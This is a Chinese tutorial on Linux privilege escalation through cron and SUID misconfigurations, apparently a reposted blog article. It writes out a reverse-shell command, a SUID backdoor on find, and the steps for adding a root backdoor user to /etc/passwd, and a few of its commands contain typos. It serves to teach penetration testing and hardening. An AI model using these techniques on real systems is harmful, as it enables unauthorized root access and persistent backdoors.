权限提升:利用Linux错配提权

目录

Linux权限基础

Linux用户权限

Linux文件权限

特殊的Linux文件权限

Linux本机信息收集

Linux错配提权

crontab计划任务提权

SUID提权


Linux权限基础

Linux用户权限

在Linux中,根据权限的不同,大致可以分为三种:超级用户(root)、普通用户、虚拟用户,从Linux中的/etc/password文件中,我们可以很详细的了解当前系统内每一个用户的不同之处,文件内容如下所示

1.root:x:0:0:root:/root:/usr/bin/zsh
2.user1:x:1000:1000:user1,,,:/home/user1:/usr/bin/zsh
3.www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

每个用户在/etc/passwd文件中的格式通常为account:passwd:UID:GID:GECOS:shell(账号:密码:用户ID:组ID:一般信息:HOME目录:shell类型)

上面的1为超级用户,2为普通用户、3为虚拟用户,1的UID和GID为0,2的UID和GID范围是 500-60000,3的UID和GID的范围为 1-499

注:虚拟用户一般是由各种服务创建的。比如www-data就是Apache服务创建的虚拟用户,专门用来运行Apache服务

Linux文件权限

Linux系统中的文件针对访问者设置了三种权限:

img

每个文件针对每访问者定义了三种主要权限:

r:read=4

w:write=2

x:xexcute=1

特殊的Linux文件权限

u+s:suid(所属用户的禁锢位)

数字标记:4

仅对可执行文本文件(命令文件)设置有意义,将某文件的所属用户进行锁死到root,不可以让其他用户代替自己称为所属用户,运行命令文件进程的所属用户是命令自身的身份;

普通用户使用在passwd执行时打开一个新的终端,在新终端中使用ps -ef 来查询该进程的运行权限:

可以看到进程的权限并非user1 而是文件创建者root。也就是说,带有SUID属性的文件,不管运行这个文件的用户是谁,它的运行者都睡变成文件的创建者,那么在执行的过程中,执行用户将会短期的拥有文件所属组的权限

g+s:sgid(所属组的禁锢位)

数字标记:2

对可执行文本文件和目录文件设置都有意义,对文本文件而言:将某文件的所属组进行锁死,不可以让其他用户代替自己称为所属组;对目录文件设置表示:在目录下所创建的文件所属组都是目录文件的所属组

即,如果一个用户对一个具有SGID属性的目录添加文件,则添加的文件的所属组将会带有SGID属性的目录的创建所属组

o+t:sticky(冒险位)

数字标记:1

对目录文件和设置有意义,作用用户只能删除属于自己的文件不能删除其他用户的文件

注意:如果为文本文件添加特殊权限执行位的x会变成S,为目录文件添加特殊权限执行位为s;

Linux本机信息收集

在Linux中执行 cat /etc/issue可以查看发型版本

执行命令 cat /etc/*release可以查询系统的详细信息

执行uname -r 可以查看系统的内核版本

如果想要查询当前系统进程列表,可以使用ps命令:

通过下面的命令可以查看当前系统中的所有用户:

cut -d: -f1 /etc/passwd

Linux错配提权

crontab计划任务提权

(1)crontab详解

计划任务是Linux中的一个非常实用的功能,在Linux中创建任务计划文件,该文件将会存储在/var/spool/cron根目录下。

存储文件的名称会与创建计划任务时所使用的用户的用户名一致,而系统应用创建计划任务生成的计划任务会存储在/etc/cron.d目录下,在使用crontab命令创建计划任务之前,需要查看当前所使用的用户是否具有执行crontab命令的权限。可以查看/etc/cron.deny文件查看该文件中记录的用户不允许执行crontab,而在/etc/cron.allow文件中记录的用户允许使用crontab命令

使用命令crontab -e创建任务计划,计划任务的格式:

minute hour day month week command 即 分 时 日 月 周

(2)利用crontab进行提权

假设一个这样的场景:root用户需要在特定的时间重启大量的服务。而将重启服务的命令一条条写到cron里面不仅工作量巨大,后期维护也是一件难事。于是root用户指定了一个Bash脚本文件,将重启服务的命令全部写入Bash脚本中,并且使用计划任务设置每天固定时间执行该脚本,这样就可以大幅减少工作量并且后期方便维护:

任务计划内容:

1 * * * * /bin/bash /tmp/rest.sh

从文件的权限中可以看到,低权限用户可以修改,且因为计划任务的原因,脚本每分钟会启动一次,并且启动者为root,此时可以以低权限用户身份向脚本中写入建立回连交互式会话的命令

bash -i > & /dev/tcp/ip/port 0>&1 

也可以写入命令

chmod u+s /usr/bin/find 

创建find后门,在任务计划中执行后,执行:

" find yum.log -exec "whoami"\;"

可以查询是否获得root权限

SUID提权

(1)查找带有SUID权限的程序

SUID主要应用于可执行程序中,执行命令chmod u+s filename 来设置 指定的可执行程序的SUID位,执行命令chmod u-s可以移除。

执行命令 find / -user root -perm -4000 -print 2> /dev/null 来查找系统中所具有SUID位且创建者为root的可执行程序

(2)利用find命令进行SUID提权

find命令是Linux中的一个用于寻找文件的命令。如果find文件存在SUID位,那么可以利用find命令自带的exec参数进行提权

首先执行下列命令查看find命令是否具有SUID权限:

ls -al $(which find)

如果有,则需要创建一个文件,或者使用当前系统的文件,因为我们要确保find命令可以成功执行

执行touch创建一个文件,然后使用下面的命令

"find 1.txt -exec whoami\;"

 

可以看到成功的拿到了root权限

(3)利用vim.basic进行SUID提权

vim是Linux下常见的文本编辑器,其中vim.basic是vim的完整版,vim.tiny是vim的缩减版,这两个版本被设置SUID位都可以进行SUID提权,vim.basic被设置SUID位后如何利用运行时的高权限向/etc/passwd文件中写入后门用户,vim.tiny的利用过程与其一致

首先使用Openssl工具生成一个密码,命令为openssl passwd -l -salt admin 123456

此时执行命令vim.basci /etc/passwd来修改文件,修改内容为:admin:...:0:0:root:/bin/bash

admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0:root:/bin/bash

退出后执行命令su admin,会发现用户添加成功了,且权限为root

(4)利用Bash进行SUID提权

Bash(Bourne Again SHell)是一种Unix shell,它是一种命令行解释器,用于Unix/Linux操作系统中执行命令和脚本,如果Bash具有SUID位,那么我们可以直接使用命令bash -p来进行提权操作,如图所示,可以看到成功的获取到了root权限

(5)利用Nano进行SUID提权

Nano是一款文本编辑器,常用于Unix操作系统。它是一款基于命令行的文本碧娜机器,简单易用,Nano提取去年操作类似于vim提权,也是利用自身高权限的特点向 /etc/passwd文件写入内容。

只需要使用openssl生成一个密码,并且使用Nano打开文件并且写入生成内容即可,最后使用su命令切换至后门用户,就可以成功提权至root用户了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/469331.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

QQ利用KEY漏洞上号登录空间邮箱网盘群管等-详细讲解

QQ利用KEY漏洞上号登录空间邮箱网盘群管等-详细讲解 QQ通过key登录空间邮箱等的原理是使用了数字签名技术。在用户登录时,QQ服务器会生成一个Key(密钥),并将该Key发送给用户的QQ软件。用户的QQ软件将密钥与其私钥进行加密&#x…

如何在Django中使用分布式定时任务并结合消息队列

如何在Django中使用分布式定时任务并结合消息队列 如何在Django中使用分布式定时任务并结合消息队列项目背景与意义实现步骤1. 安装Celery和Django-celery-beat2. 配置Celery3. 配置Django-celery-beat4. 定义定时任务5. 启动Celery worker 和 beat6. Celery 指令7. 对接消息队…

maven创建webapp+Freemarker组件的实现

下载安装配置maven Maven官方版下载丨最新版下载丨绿色版下载丨APP下载-123云盘123云盘为您提供Maven最新版正式版官方版绿色版下载,Maven安卓版手机版apk免费下载安装到手机,支持电脑端一键快捷安装https://www.123pan.com/s/9QRqVv-TcUY.html链接为3.6.2-3.6.3的版本 下载解…

代码+视频基于R语言进行K折交叉验证

我们在建立数据模型后通常希望在外部数据验证模型的检验能力。然而当没有外部数据可以验证的时候,交叉验证也不失为一种方法。交叉验验证(交叉验证,CV)则是一种评估模型泛化能力的方法,广泛应用…

tee漏洞学习-翻译-3:TrustZone exploit for MSM8974

原文:http://bits-please.blogspot.com/2015/08/full-trustzone-exploit-for-msm8974.html 在这篇博文中,我们将介绍利用上一篇文章中描述的 TrustZone 漏洞的完整过程。 在开发此漏洞时,我只使用了我值得信赖的(个人&#xff0…

电脑上用什么软件恢复数据?2024年受欢迎的恢复软件推荐

在当今数字化的时代,电脑已经成为我们生活中不可或缺的工具。然而,由于各种原因,我们的电脑可能会出现数据丢失的情况。这时,一款好的数据恢复软件就显得尤为重要。本文将为大家介绍一款在2024年备受推崇的数据恢复软件&#xff0…

第13章 网络 Page724 asio定时器

程序代码: 11行,声明一个ios对象 13行,使用ios对象作为参数声明一个定时器,此时,定时器和ios完成了关联,后面定时器如果有任务的话,就可以将任务交给ios 16行,为定时器设置一个定…

2048游戏C++板来啦!

个人主页:PingdiGuo_guo 收录专栏:C干货专栏 大家好呀,我是PingdiGuo_guo,今天我们来学习如何用C编写一个2048小游戏。 文章目录 1.2048的规则 2.步骤实现 2.1: 初始化游戏界面 2.1.1知识点 2.1.2: 创建游戏界面 2.2: 随机…

【光学】学习记录1-几何光学的近轴理论

课程来源:b站资源-光学-中科大-崔宏滨老师(感谢),本系列仅为自学笔记 【光学 中科大 崔宏滨老师 1080p高清修复(全集)】https://www.bilibili.com/video/BV1NG4y1C7T9?p2&vd_source7ba37b2cff2a1b783…

生活篇——华为手机去除负一屏

华为手机去除如下图的恶心负一屏 打开华为的应用市场app 进入:我的-设置-国家/地区(改为俄罗斯)-进入智慧助手检查更新并更新智慧助手。 然后重复开始的操作,将地区改回中国,这样就没有负一屏了。

Leetcode 115 不同的子序列

题意理解: 给你两个字符串 s 和 t ,统计并返回在 s 的 子序列 中 t 出现的个数,结果需要对 109 7 取模。 即此题可以理解为:从s中删除元素去构造t,有多少种方法 或者也可以理解为:s中按顺序取t,有多少个 则一定有s和t…

LeetCode Python - 17.电话号码的字母组合

目录 题目答案运行结果 题目 给定一个仅包含数字 2-9 的字符串,返回所有它能表示的字母组合。答案可以按 任意顺序 返回。 给出数字到字母的映射如下(与电话按键相同)。注意 1 不对应任何字母。 示例 1: 输入:digits…